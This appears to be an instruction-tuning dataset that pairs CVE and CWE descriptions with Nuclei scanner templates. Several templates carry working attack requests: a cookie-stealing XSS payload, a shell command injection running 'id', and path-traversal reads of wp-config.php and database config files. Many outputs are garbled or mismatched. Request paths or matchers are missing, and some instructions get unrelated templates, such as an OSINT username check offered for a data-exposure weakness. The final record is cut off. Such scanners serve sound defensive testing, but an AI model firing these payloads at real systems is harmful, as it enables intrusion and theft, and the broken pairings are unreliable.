{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: soccitizen4eu\n\ninfo:\n name: Soc.citizen4.eu User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Soc.citizen4.eu user name information check was conducted.\n tags: osint,osint-social,soccitizen4eu,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://soc.citizen4.eu/profile/{{user}}/profile\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"@soc.citizen4.eu\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Complianz \u2013 GDPR/CCPA Cookie Consent Detection", "input": "Title: Complianz \u2013 GDPR/CCPA Cookie Consent Detection\nSummary: Complianz \u2013 GDPR/CCPA Cookie Consent Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-complianz-gdpr\n\ninfo:\n name: Complianz \u2013 GDPR/CCPA Cookie Consent Detection\n author: ricardomaia\n severity: info\n description: Complianz \u2013 GDPR/CCPA Cookie Consent Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-complianz-gdpr"} {"instruction": "Generate a Nuclei template for CVE-2023-5830", "input": "Title: Authentication Bypass in documentlocator document_locator\nSummary: A vulnerability classified as critical has been found in ColumbiaSoft Document Locator. This affects an unknown part of the file /api/authentication/login of the component WebTools. The manipulation of the argument Server leads to improper authentication. It is possible to initiate the attack remotely. Upgrading to version 7.2 SP4 and 2021.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-243729 was assigned to this vulnerability.\nVulnerability Type: Authentication Bypass\nSeverity: high\nAffected Products: documentlocator document_locator\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-5830\n\ninfo:\n name: ColumbiaSoft DocumentLocator - Improper Authentication\n author: Gonski\n severity: critical\n description: Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: word\n words:\n - \"\"Authorized\":false\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2023-5830"} {"instruction": "Generate a Nuclei template for CVE-2021-21087", "input": "Title: Cross-Site Scripting (XSS) in adobe coldfusion\nSummary: Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: adobe coldfusion\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-21087\n\ninfo:\n name: Adobe ColdFusion - Cross-Site Scripting\n author: Daviey\n severity: medium\n description: Adobe Coldfusion versions 2016 (update 16 and earlier), 2018 (update 10 and earlier) and 2021.0.0.323925 are affected by an Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability. An attacker could abuse this vulnerability to execute arbitrary JavaScript code in context of the current user. Exploitation of this issue requires user interaction.\n tags: cve2021,cve,xss,adobe,misc,coldfusion,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js\" \n - \"{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js\" \n - \"{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js\" \n - \"{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js\" \n - \"{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js\" \n - \"{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js\" \n - \"{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-21087"} {"instruction": "Generate a Nuclei template for CVE-2021-26085", "input": "Title: Vulnerability (CWE-425) in atlassian confluence_data_center and others\nSummary: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.\nVulnerability Type: Vulnerability (CWE-425)\nSeverity: medium\nAffected Products: atlassian confluence_data_center, atlassian confluence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-26085\n\ninfo:\n name: Atlassian Confluence Server - Local File Inclusion\n author: princechaddha\n severity: medium\n description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint.\n tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml\" \n matchers:\n - type: word\n words:\n - \"Confluence\" \n - \"com.atlassian.confluence.setup.ConfluenceAppConfig\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-26085"} {"instruction": "Generate a Nuclei template for CVE-2024-11728", "input": "Title: SQL Injection in iqonic kivicare\nSummary: The KiviCare \u2013 Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: iqonic kivicare\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11728\n\ninfo:\n name: KiviCare Clinic & Patient Management System (EHR) <= 3.6.4 - SQL Injection\n author: samogod,s4e-io\n severity: high\n description: The KiviCare Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,kivicare-clinic-management-system,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/plugins/kivicare-clinic-management-system\" \n part: body\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2024-11728"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: hpe-system-management-login\n\ninfo:\n name: Hewlett Packard Enterprise System Management Login Panel - Detect\n author: divya_mudgal\n severity: info\n description: Hewlett Packard Enterprise System Management login page was detected.\n tags: hpe,tech,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cpqlogin.htm\" \n matchers:\n - type: word\n words:\n - \"HPE System Management Homepage\" \n - \"/proxy/ssllogin\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: OA E-Office officeserver.php Arbitrary File Read", "input": "Title: OA E-Office officeserver.php Arbitrary File Read\nSummary: OA E-Office officeserver.php Arbitrary File Read. There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: weaver-officeserver-lfi\n\ninfo:\n name: OA E-Office officeserver.php Arbitrary File Read\n author: SleepingBag945\n severity: high\n description: There is an arbitrary file reading vulnerability in the OA E-Office officeserver.php file. An attacker can download any file on the server through the vulnerability.\n tags: weaver,e-cology,oa,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini\" \n matchers:\n - type: word\n words:\n - \"datapassword =\" \n - \"datauser =\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "weaver-officeserver-lfi"} {"instruction": "Generate a Nuclei template to detect SQL Injection", "input": "Title: SQL Injection (CWE-89)\nSummary: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.\nVulnerability Type: SQL Injection\nSeverity: critical\nIndicators: vulnerability detected, error", "output": "id: suspicious-sql-error-messages\n\ninfo:\n name: SQL - Error Messages\n author: geeknik\n severity: critical\n description: SQL error messages that indicate probing for an injection attack were detected.\n tags: file,logs,sql,error\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "critical", "id": "CWE-89"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: looker-panel\n\ninfo:\n name: Looker Login Panel - Detect\n author: ritikchaddha,daffainfo\n severity: info\n description: Looker login panel was detected.\n tags: panel,login,looker,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"lookerVersion\" \n - \"lookerLocation.title\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-38154", "input": "Title: Vulnerability (CWE-732) in canon -\nSummary: Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.\nVulnerability Type: Vulnerability (CWE-732)\nSeverity: high\nAffected Products: canon -\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-38154\n\ninfo:\n name: Canon Devices - Authentication Bypass in Catwalk Server\n author: daffainfo\n severity: high\n description: Certain Canon devices manufactured in 2012 through 2020 (such as imageRUNNER ADVANCE iR-ADV C5250), when Catwalk Server is enabled for HTTP access, allow remote attackers to modify an e-mail address setting, and thus cause the device to send sensitive information through e-mail to the attacker. For example, an incoming FAX may be sent through e-mail to the attacker. This occurs when a PIN is not required for General User Mode, as exploited in the wild in August 2021.\n tags: cve,cve2021,canon,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2021-38154"} {"instruction": "Generate a Nuclei template for CVE-2014-4539", "input": "Title: Cross-Site Scripting (XSS) in movies_project movies\nSummary: Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: movies_project movies\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-4539\n\ninfo:\n name: Movies <= 0.6 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.\n tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Movies =\" \n - \"Tags:\" \n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&\" \n matchers:\n - type: word\n words:\n - \"'>\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-4539"} {"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: health-check-lfi\n\ninfo:\n name: WordPress Health Check & Troubleshooting <1.24 - Local File Inclusion\n author: DhiyaneshDK\n severity: high\n description: WordPress Health Check & Troubleshooting prior to 1.2.4 is vulnerable to local file inclusion. Exploitation does require authentication.\n tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-22"} {"instruction": "Generate a Nuclei template for: Concrete Security Checks", "input": "Title: Concrete Security Checks\nSummary: Concrete Security Checks. A simple workflow that runs all Concrete related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: concrete-workflow\n\ninfo:\n name: Concrete Security Checks\n author: dhiyaneshDK\n severity: info\n description: A simple workflow that runs all Concrete related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "concrete-workflow"} {"instruction": "Generate a Nuclei template for CVE-2023-50917", "input": "Title: Vulnerability (CWE-77) in mjdm majordomo\nSummary: MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\nVulnerability Type: Vulnerability (CWE-77)\nSeverity: critical\nAffected Products: mjdm majordomo\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-50917\n\ninfo:\n name: MajorDoMo thumb.php - OS Command Injection\n author: DhiyaneshDK\n severity: critical\n description: MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n tags: packetstorm,seclists,cve,cve2023,majordomo,rce,os,mjdm,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B\" \n matchers:\n - type: regex\n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-50917"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: splunk-enterprise-panel\n\ninfo:\n name: Splunk Enterprise Login Panel - Detect\n author: praetorian-thendrickson\n severity: info\n description: Splunk Enterprise login panel was detected.\n tags: panel,splunk,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/en-US/account/login\" \n matchers:\n - type: word\n words:\n - \"Splunk Inc.\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2014-5368", "input": "Title: Path Traversal in wp_content_source_control_project wp_content_source_control\nSummary: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: wp_content_source_control_project wp_content_source_control\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-5368\n\ninfo:\n name: WordPress Plugin WP Content Source Control - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.\n tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php\" \n matchers:\n - type: word\n words:\n - \"DB_NAME\" \n - \"DB_PASSWORD\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-5368"} {"instruction": "Generate a Nuclei template for: Ensure dnsmasq Service is Not Installed", "input": "Title: Ensure dnsmasq Service is Not Installed\nSummary: Ensure dnsmasq Service is Not Installed. The dnsmasq package provides lightweight DNS, DHCP, and TFTP services. If not explicitly required, its presence may expose unnecessary services and increase security risks.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dnsmasq-service\n\ninfo:\n name: Ensure dnsmasq Service is Not Installed\n author: Th3l0newolf\n severity: info\n description: The dnsmasq package provides lightweight DNS, DHCP, and TFTP services. If not explicitly required, its presence may expose unnecessary services and increase security risks.\n tags: cis,local,cisecurity,audit,linux,ubuntu\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "dnsmasq-service"} {"instruction": "Generate a Nuclei template for CVE-2016-7834", "input": "Title: Information Disclosure in sony snc_series_firmware\nSummary: SONY SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120, SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520, SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551, SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585, SNC-ER585H, SNC-ZP550, SNC-ZR550, SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C network cameras with firmware before Ver.1.86.00 and SONY SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630, SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC, SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B, SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635, SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R, SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600, SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631, SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L, SNC-WR602CL network cameras with firmware before Ver.2.7.2 are prone to sensitive information disclosure. This may allow an attacker on the same local network segment to login to the device with administrative privileges and perform operations on the device.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: sony snc_series_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-7834\n\ninfo:\n name: Sony IPELA Engine IP Camera - Hardcoded Account\n author: af001\n severity: high\n description: Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.\n tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/command/prima-factory.cgi\" \n matchers:\n - type: word\n words:\n - \"gen5th\" \n - \"gen6th\" \n part: header\n condition: or\n - type: status\n status:\n - 204", "category": "cve", "severity": "high", "id": "CVE-2016-7834"} {"instruction": "Generate a Nuclei template for: FastCGI Echo Endpoint Script - Detect", "input": "Title: FastCGI Echo Endpoint Script - Detect\nSummary: FastCGI Echo Endpoint Script - Detect. FastCGI echo endpoint script was detected, which lists several kinds of sensitive information such as port numbers, server software versions, port numbers, and IP addresses.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: fastcgi-echo\n\ninfo:\n name: FastCGI Echo Endpoint Script - Detect\n author: powerexploit\n severity: info\n description: FastCGI echo endpoint script was detected, which lists several kinds of sensitive information such as port numbers, server software versions, port numbers, and IP addresses.\n tags: exposure,logs,oracle,fastcgi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fcgi-bin/echo\" \n matchers:\n - type: word\n words:\n - \"FastCGI echo\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "fastcgi-echo"} {"instruction": "Generate a Nuclei template for CVE-2020-1938", "input": "Title: Unknown Vulnerability in apache geode and others\nSummary: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: apache geode, apache tomcat, fedoraproject fedora\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-1938\n\ninfo:\n name: Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability\n author: milo2012\n severity: critical\n description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.\n tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp,tcp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-1938"} {"instruction": "Generate a Nuclei template for: LuminosityLink Malware - Detect", "input": "Title: LuminosityLink Malware - Detect\nSummary: LuminosityLink Malware - Detect. Tags: malware, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: luminositylink-malware\n\ninfo:\n name: LuminosityLink Malware - Detect\n author: daffainfo\n severity: info\n description: LuminosityLink Malware - Detect\n tags: malware,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "luminositylink-malware"} {"instruction": "Generate a Nuclei template for: skype phishing Detection", "input": "Title: skype phishing Detection\nSummary: skype phishing Detection. A skype phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: skype-phish\n\ninfo:\n name: skype phishing Detection\n author: rxerium\n severity: info\n description: A skype phishing website was detected\n tags: phishing,skype,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Skype | Stay connected with free video calls worldwide\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "skype-phish"} {"instruction": "Generate a Nuclei template for CVE-2023-39796", "input": "Title: SQL Injection in wbce wbce_cms\nSummary: SQL injection vulnerability in the miniform module in WBCE CMS v.1.6.0 allows remote unauthenticated attacker to execute arbitrary code via the DB_RECORD_TABLE parameter.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: wbce wbce_cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39796\n\ninfo:\n name: WBCE 1.6.0 - SQL Injection\n author: youngpope\n severity: critical\n description: There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-39796"} {"instruction": "Generate a Nuclei template for: Linkerd SSRF detection", "input": "Title: Linkerd SSRF detection\nSummary: Linkerd SSRF detection. Linkerd is vulnerable to SSRF.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: linkerd-ssrf-detection\n\ninfo:\n name: Linkerd SSRF detection\n author: dudez\n severity: high\n description: Linkerd is vulnerable to SSRF.\n tags: ssrf,linkerd,oast,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "generic", "severity": "high", "id": "linkerd-ssrf-detection"} {"instruction": "Generate a Nuclei template for: macOS Insecure /etc/sudoers Permissions", "input": "Title: macOS Insecure /etc/sudoers Permissions\nSummary: macOS Insecure /etc/sudoers Permissions. Audits permissions on the /etc/sudoers file that defines which users can run commands with root privileges on macOS.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: insecure-sudoers-permissions\n\ninfo:\n name: macOS Insecure /etc/sudoers Permissions\n author: geeknik\n severity: high\n description: Audits permissions on the /etc/sudoers file that defines which users can run commands with root privileges on macOS.\n tags: macos,audit,local,security,sudo\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "insecure-sudoers-permissions"} {"instruction": "Generate a Nuclei template to detect Open Redirect", "input": "Title: Open Redirect (CWE-601)\nSummary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.\nVulnerability Type: Open Redirect\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: bitrix-open-redirect\n\ninfo:\n name: Bitrix Site Management Russia 2.0 - Open Redirect\n author: 